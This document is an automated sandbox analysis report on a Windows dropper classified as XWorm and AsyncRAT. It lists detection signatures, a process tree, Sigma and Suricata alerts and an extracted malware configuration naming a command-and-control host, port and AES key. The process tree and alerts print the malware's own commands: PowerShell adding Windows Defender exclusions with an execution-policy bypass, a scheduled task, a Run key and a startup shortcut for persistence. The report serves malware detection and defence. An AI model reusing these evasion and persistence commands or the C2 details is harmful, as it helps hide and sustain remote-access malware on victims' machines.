Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
YgJ5inWPQO.exe

Overview

General Information

Sample name:YgJ5inWPQO.exe
renamed because original name is a hash value
Original sample name:fdd53599267201df460d004d399609274c7f0ba5342004d5c73e817f33a670a2.exe
Analysis ID:1579069
MD5:abbb4a5a77f9cf1530d24710a621026c
SHA1:a8b3f3d965202dfd6b7a9cc10963c0cfccf35682
SHA256:fdd53599267201df460d004d399609274c7f0ba5342004d5c73e817f33a670a2
Tags:exeuser-Chainskilabs
Infos:

Detection

AsyncRAT, XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AsyncRAT
Yara detected Powershell download and execute
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Connects to many ports of the same IP (likely port scanning)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Found pyInstaller with non standard icon
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses cmd line tools excessively to alter registry or file data
Uses ipconfig to lookup or modify the Windows network settings
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Electron Application Child Processes
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • YgJ5inWPQO.exe (PID: 432 cmdline: "C:\Users\user\Desktop\YgJ5inWPQO.exe" MD5: ABBB4A5A77F9CF1530D24710A621026C)
    • YgJ5inWPQO.exe (PID: 5352 cmdline: "C:\Users\user\Desktop\YgJ5inWPQO.exe" MD5: ABBB4A5A77F9CF1530D24710A621026C)
      • cmd.exe (PID: 2332 cmdline: C:\Windows\system32\cmd.exe /c "attrib +h C:\Users\user\AppData\Local\Temp\msedge.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • attrib.exe (PID: 5236 cmdline: attrib +h C:\Users\user\AppData\Local\Temp\msedge.exe MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • cmd.exe (PID: 3116 cmdline: C:\Windows\system32\cmd.exe /c "attrib +h C:\Users\user\AppData\Local\Temp\dddd.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • attrib.exe (PID: 5768 cmdline: attrib +h C:\Users\user\AppData\Local\Temp\dddd.exe MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • cmd.exe (PID: 4568 cmdline: C:\Windows\system32\cmd.exe /c "START C:\Users\user\AppData\Local\Temp\msedge.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • msedge.exe (PID: 5560 cmdline: C:\Users\user\AppData\Local\Temp\msedge.exe MD5: A3B7B97F81C08C56A79971799B793072)
          • powershell.exe (PID: 4932 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\msedge.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 4676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 2212 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 2888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7288 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\System User.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7524 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System User.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • schtasks.exe (PID: 7792 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "System User" /tr "C:\Users\user\AppData\Roaming\System User.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • conhost.exe (PID: 7800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 4280 cmdline: C:\Windows\system32\cmd.exe /c "START C:\Users\user\AppData\Local\Temp\dddd.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • dddd.exe (PID: 6476 cmdline: C:\Users\user\AppData\Local\Temp\dddd.exe MD5: 02C70D9D6696950C198DB93B7F6A835E)
          • conhost.exe (PID: 6828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5012 cmdline: "cmd" /c ipconfig /all MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • ipconfig.exe (PID: 5292 cmdline: ipconfig /all MD5: 62F170FB07FDBB79CEB7147101406EB8)
          • WerFault.exe (PID: 3576 cmdline: C:\Windows\system32\WerFault.exe -u -p 6476 -s 2224 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • System User.exe (PID: 7868 cmdline: "C:\Users\user\AppData\Roaming\System User.exe" MD5: A3B7B97F81C08C56A79971799B793072)
  • System User.exe (PID: 8160 cmdline: "C:\Users\user\AppData\Roaming\System User.exe" MD5: A3B7B97F81C08C56A79971799B793072)
  • System User.exe (PID: 2296 cmdline: "C:\Users\user\AppData\Roaming\System User.exe" MD5: A3B7B97F81C08C56A79971799B793072)
  • System User.exe (PID: 1976 cmdline: "C:\Users\user\AppData\Roaming\System User.exe" MD5: A3B7B97F81C08C56A79971799B793072)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
AsyncRATAsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat
NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["hope-asia.gl.at.ply.gg"], "Port": 35710, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
\Device\ConDrvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
    C:\Users\user\AppData\Roaming\System User.exeJoeSecurity_XWormYara detected XWormJoe Security
      C:\Users\user\AppData\Roaming\System User.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
        C:\Users\user\AppData\Roaming\System User.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
        • 0x1061b:$s6: VirtualBox
        • 0x10579:$s8: Win32_ComputerSystem
        • 0x12a7d:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
        • 0x12b1a:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
        • 0x12c2f:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
        • 0x12179:$cnc4: POST / HTTP/1.1
        C:\Users\user\AppData\Local\Temp\msedge.exeJoeSecurity_XWormYara detected XWormJoe Security
          Click to see the 2 entries

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          00000002.00000003.1479245702.000001D8A966B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
            00000002.00000003.1479245702.000001D8A966B000.00000004.00000020.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0x42a4b:$s6: VirtualBox
            • 0x429a9:$s8: Win32_ComputerSystem
            • 0x44ead:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0x44f4a:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0x4505f:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0x445a9:$cnc4: POST / HTTP/1.1
            00000002.00000003.1485033909.000001D8A9686000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
              00000002.00000003.1485033909.000001D8A9686000.00000004.00000020.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
              • 0x27a4b:$s6: VirtualBox
              • 0x279a9:$s8: Win32_ComputerSystem
              • 0x29ead:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
              • 0x29f4a:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
              • 0x2a05f:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
              • 0x295a9:$cnc4: POST / HTTP/1.1
              00000002.00000003.1477560662.000001D8A96BD000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
                Click to see the 17 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                2.3.YgJ5inWPQO.exe.1d8a969d430.4.unpackJoeSecurity_XWormYara detected XWormJoe Security
                  2.3.YgJ5inWPQO.exe.1d8a969d430.4.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                  • 0xe81b:$s6: VirtualBox
                  • 0xe779:$s8: Win32_ComputerSystem
                  • 0x10c7d:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                  • 0x10d1a:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                  • 0x10e2f:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                  • 0x10379:$cnc4: POST / HTTP/1.1
                  2.3.YgJ5inWPQO.exe.1d8a969d430.4.raw.unpackJoeSecurity_XWormYara detected XWormJoe Security
                    2.3.YgJ5inWPQO.exe.1d8a969d430.4.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                      2.3.YgJ5inWPQO.exe.1d8a969d430.4.raw.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                      • 0x1061b:$s6: VirtualBox
                      • 0x10579:$s8: Win32_ComputerSystem
                      • 0x12a7d:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                      • 0x12b1a:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                      • 0x12c2f:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                      • 0x12179:$cnc4: POST / HTTP/1.1
                      Click to see the 34 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\msedge.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\msedge.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\msedge.exe, ParentImage: C:\Users\user\AppData\Local\Temp\msedge.exe, ParentProcessId: 5560, ParentProcessName: msedge.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\msedge.exe', ProcessId: 4932, ProcessName: powershell.exe
                      Sigma detected: Script Interpreter Execution From Suspicious Folder
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\msedge.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\msedge.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\msedge.exe, ParentImage: C:\Users\user\AppData\Local\Temp\msedge.exe, ParentProcessId: 5560, ParentProcessName: msedge.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\msedge.exe', ProcessId: 4932, ProcessName: powershell.exe
                      Sigma detected: Suspicious Script Execution From Temp Folder
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\msedge.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\msedge.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\msedge.exe, ParentImage: C:\Users\user\AppData\Local\Temp\msedge.exe, ParentProcessId: 5560, ParentProcessName: msedge.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\msedge.exe', ProcessId: 4932, ProcessName: powershell.exe
                      Sigma detected: Change PowerShell Policies to an Insecure Level
                      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\msedge.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\msedge.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\msedge.exe, ParentImage: C:\Users\user\AppData\Local\Temp\msedge.exe, ParentProcessId: 5560, ParentProcessName: msedge.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\msedge.exe', ProcessId: 4932, ProcessName: powershell.exe
                      Sigma detected: CurrentVersion Autorun Keys Modification
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\System User.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\msedge.exe, ProcessId: 5560, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System User
                      Sigma detected: Powershell Defender Exclusion
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\msedge.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\msedge.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\msedge.exe, ParentImage: C:\Users\user\AppData\Local\Temp\msedge.exe, ParentProcessId: 5560, ParentProcessName: msedge.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\msedge.exe', ProcessId: 4932, ProcessName: powershell.exe
                      Sigma detected: Startup Folder File Write
                      Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\msedge.exe, ProcessId: 5560, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System User.lnk
                      Sigma detected: Suspicious Add Scheduled Task Parent
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "System User" /tr "C:\Users\user\AppData\Roaming\System User.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "System User" /tr "C:\Users\user\AppData\Roaming\System User.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\msedge.exe, ParentImage: C:\Users\user\AppData\Local\Temp\msedge.exe, ParentProcessId: 5560, ParentProcessName: msedge.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "System User" /tr "C:\Users\user\AppData\Roaming\System User.exe", ProcessId: 7792, ProcessName: schtasks.exe
                      Sigma detected: Suspicious Electron Application Child Processes
                      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\msedge.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\msedge.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\msedge.exe, ParentImage: C:\Users\user\AppData\Local\Temp\msedge.exe, ParentProcessId: 5560, ParentProcessName: msedge.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\msedge.exe', ProcessId: 4932, ProcessName: powershell.exe
                      Sigma detected: Suspicious Schtasks From Env Var Folder
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "System User" /tr "C:\Users\user\AppData\Roaming\System User.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "System User" /tr "C:\Users\user\AppData\Roaming\System User.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\msedge.exe, ParentImage: C:\Users\user\AppData\Local\Temp\msedge.exe, ParentProcessId: 5560, ParentProcessName: msedge.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "System User" /tr "C:\Users\user\AppData\Roaming\System User.exe", ProcessId: 7792, ProcessName: schtasks.exe
                      Sigma detected: Non Interactive PowerShell Process Spawned
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\msedge.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\msedge.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\msedge.exe, ParentImage: C:\Users\user\AppData\Local\Temp\msedge.exe, ParentProcessId: 5560, ParentProcessName: msedge.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\msedge.exe', ProcessId: 4932, ProcessName: powershell.exe
                      Sigma detected: Suspicious Network Command
                      Source: Process startedAuthor: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io': Data: Command: "cmd" /c ipconfig /all, CommandLine: "cmd" /c ipconfig /all, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\dddd.exe, ParentImage: C:\Users\user\AppData\Local\Temp\dddd.exe, ParentProcessId: 6476, ParentProcessName: dddd.exe, ProcessCommandLine: "cmd" /c ipconfig /all, ProcessId: 5012, ProcessName: cmd.exe

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-20T19:03:21.950129+010028033053Unknown Traffic192.168.2.849707104.21.93.27443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-20T19:05:22.723190+010028559241Malware Command and Control Activity Detected192.168.2.849838147.185.221.1835710TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus detection for dropped file
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeAvira: detection malicious, Label: TR/Spy.Gen
                      Source: C:\Users\user\AppData\Roaming\System User.exeAvira: detection malicious, Label: TR/Spy.Gen
                      Found malware configuration
                      Source: 0000000C.00000002.2742589628.0000000002601000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["hope-asia.gl.at.ply.gg"], "Port": 35710, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeReversingLabs: Detection: 63%
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeReversingLabs: Detection: 81%
                      Source: C:\Users\user\AppData\Roaming\System User.exeReversingLabs: Detection: 81%
                      Multi AV Scanner detection for submitted file
                      Source: YgJ5inWPQO.exeReversingLabs: Detection: 26%
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Machine Learning detection for dropped file
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Roaming\System User.exeJoe Sandbox ML: detected
                      Sample uses string decryption to hide its real strings
